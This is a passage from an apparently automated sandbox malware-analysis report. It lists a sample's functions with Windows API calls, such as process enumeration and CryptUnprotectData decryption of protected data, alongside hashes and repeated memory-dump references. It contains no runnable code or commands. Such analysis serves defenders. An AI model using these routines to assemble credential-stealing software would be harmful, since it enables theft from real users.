                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: d5f01764cf93fdbc51a357c1c7f02b13034b98903f71cabda2c2d4302241bc47
                                      • Instruction ID: 292c38c52069bdd85d6fc9331ba600636f6ee67c86e0ddca6ac3b14eeafc7e02
                                      • Opcode Fuzzy Hash: d5f01764cf93fdbc51a357c1c7f02b13034b98903f71cabda2c2d4302241bc47
                                      • Instruction Fuzzy Hash: F90112B5A44308BBDB20DFE4DC46F9D7778AB44B00F104545FB45AB2C4D675BA008B64
                                      Function 00D49790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D497AE
                                      • Process32First.KERNEL32(00D50ACE,00000128), ref: 00D497C2
                                      • Process32Next.KERNEL32(00D50ACE,00000128), ref: 00D497D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00D497EC
                                      • CloseHandle.KERNEL32(00D50ACE), ref: 00D4980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 292a334acc202dbfa979999881b211db2d9ae69f2b404d6bad769f30e165b707
                                      • Instruction ID: cf3f83032378ae2d43b7c5d567c4de5a9e073c7223ec750f45086c7f563a5fa0
                                      • Opcode Fuzzy Hash: 292a334acc202dbfa979999881b211db2d9ae69f2b404d6bad769f30e165b707
                                      • Instruction Fuzzy Hash: 00012175A10208EBDB21DFA9C954BDEBBB9BF08700F104588E589E7240D779EB40CF60
                                      Function 00D54573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: <7\h$huzx
                                      • API String ID: 0-2989614873
                                      • Opcode ID: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                                      • Instruction ID: f41448ea8fe2500d0d6c71474c8fea8ce53f697fbe33638cfeff7080750f63d6
                                      • Opcode Fuzzy Hash: ab1d40ea7e0eeb2e93dffcc38579f2f2ae73fc34c918808c8c92b9b41b718b51
                                      • Instruction Fuzzy Hash: 3A63533241EBD51ECB27CB3057B61517FA6BA1321231D49CECCC18F4B7C694AA1AE366
                                      Function 01198AE7 Relevance: 6.7, Strings: 4, Instructions: 1679COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 4q2$ IM?$AmW?$o!wZ
                                      • API String ID: 0-2740203039
                                      • Opcode ID: 9abd608ae0396281b7b7cbb9fbec755498ad87602ee141c3a2f03f621039bccd
                                      • Instruction ID: b9314e2b905cfce5f739c2797205fc322d1c92585c0988b4f514da3fee96e01c
                                      • Opcode Fuzzy Hash: 9abd608ae0396281b7b7cbb9fbec755498ad87602ee141c3a2f03f621039bccd
                                      • Instruction Fuzzy Hash: 95B219F3A0C204AFE3046E29EC8577AFBE9EF94720F1A453DE6C4C7744E67558018696
                                      Function 00D49030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00D351D4,40000001,00000000,00000000,?,00D351D4), ref: 00D49050
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 1a0a47194c8ad3acead33d5de89872b6180ed37a9f68817106958b2725f2538e
                                      • Instruction ID: 529115c4f09ee38204e2197cf7d0b2b5c5070e7aef74f19efcc7359ac9661bf4
                                      • Opcode Fuzzy Hash: 1a0a47194c8ad3acead33d5de89872b6180ed37a9f68817106958b2725f2538e
                                      • Instruction Fuzzy Hash: 54110AB4200204FFDF10CF95D894FAB73A9AF89310F108548F9698B240D776E9419B70
                                      Function 00D3A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A23F
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00D34F3E,00000000,?), ref: 00D3A251
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34F3E,00000000,00000000), ref: 00D3A27A
                                      • LocalFree.KERNEL32(?,?,?,?,00D34F3E,00000000,?), ref: 00D3A28F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: 7a841255defbdd5344d1122e9315b2d4d66884e7db2bd074975e9dc441f46d16
                                      • Instruction ID: 511d486c6c07bd5ac817510d537d6015846bce6475bdccb7ae7b92cb9c51bf86
                                      • Opcode Fuzzy Hash: 7a841255defbdd5344d1122e9315b2d4d66884e7db2bd074975e9dc441f46d16
                                      • Instruction Fuzzy Hash: AA11A474240308AFEB11CF64C895FAA77B5EB89B10F208458FD559B380C776A941CB54
                                      Function 00D47BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0167E500,00000000,?,00D50DF8,00000000,?,00000000,00000000), ref: 00D47BF3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47BFA
                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0167E500,00000000,?,00D50DF8,00000000,?,00000000,00000000,?), ref: 00D47C0D
                                      • wsprintfA.USER32 ref: 00D47C47
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID:
                                      • API String ID: 3317088062-0
                                      • Opcode ID: 8be2dc8e31629419e4ba48b41958d9a7e15829b9bb4e3d040853d69b5c1b69e6
                                      • Instruction ID: 06f9605e2be4121497cd3ac3b7a6d6e7c688449c9533ac2451234ef93da9cc20
                                      • Opcode Fuzzy Hash: 8be2dc8e31629419e4ba48b41958d9a7e15829b9bb4e3d040853d69b5c1b69e6
                                      • Instruction Fuzzy Hash: 2E11A1B1A05219EFEB20DB54DC45FA9BB78FB44711F1043E5FA59932C0D7786A448B60
                                      Function 01188284 Relevance: 5.4, Strings: 3, Instructions: 1621COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 3z$C)&l$zgeq
                                      • API String ID: 0-1430241905
                                      • Opcode ID: 451c4c910579c5aaed0ba410e50a2a853ddfac14d9361be727038f4e2af4adb6
                                      • Instruction ID: 894007a97da034c0ecb5f0ecf2f371f7ea133c351f0c7d13e2c31dcdca24868c
                                      • Opcode Fuzzy Hash: 451c4c910579c5aaed0ba410e50a2a853ddfac14d9361be727038f4e2af4adb6
                                      • Instruction Fuzzy Hash: C1B227F3A0C6049FE3046E2DEC8567ABBE9EFD4720F1A853DE6C483744EA3558058696
                                      Function 00D43970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.COMBASE(00D4E120,00000000,00000001,00D4E110,00000000), ref: 00D439A8
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D43A00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID:
                                      • API String ID: 123533781-0
                                      • Opcode ID: 765435c459fee9f0385211ebcde03005755c8712e302923a1f0c70a57e7082ee
                                      • Instruction ID: 2f2c1ecb3e046657970be1df6b63891558cf8c017d288704dde05857fa7af1cd
                                      • Opcode Fuzzy Hash: 765435c459fee9f0385211ebcde03005755c8712e302923a1f0c70a57e7082ee
                                      • Instruction Fuzzy Hash: E941D870A40A28AFDB24DB58CC95B9BB7B5FB48702F4041D8E658E72D0D771AE85CF60
                                      Function 00D3A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D3A2D4
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D3A2F3
                                      • LocalFree.KERNEL32(?), ref: 00D3A323
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$AllocCryptDataFreeUnprotect
                                      • String ID:
                                      • API String ID: 2068576380-0
                                      • Opcode ID: c328219f9a94e77a8f62e73b432af81fd0df6182fac76cddfb4e53792348919d
                                      • Instruction ID: 8ff847ff743a85ff4dff562b9c3da7821370b3ec8523a3314683c7e55dfef105
                                      • Opcode Fuzzy Hash: c328219f9a94e77a8f62e73b432af81fd0df6182fac76cddfb4e53792348919d
                                      • Instruction Fuzzy Hash: 9111FAB8A00209EFDB05DF98D884AAEB7B5FF89300F104559ED5597340D734AE50CFA1
                                      Function 00DA4BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ?$__ZN
                                      • API String ID: 0-1427190319
                                      • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                      • Instruction ID: b30ab793bac785d6bb136820fdeb9fadc5eceae31aa1c67e3412eff1c4172b4a
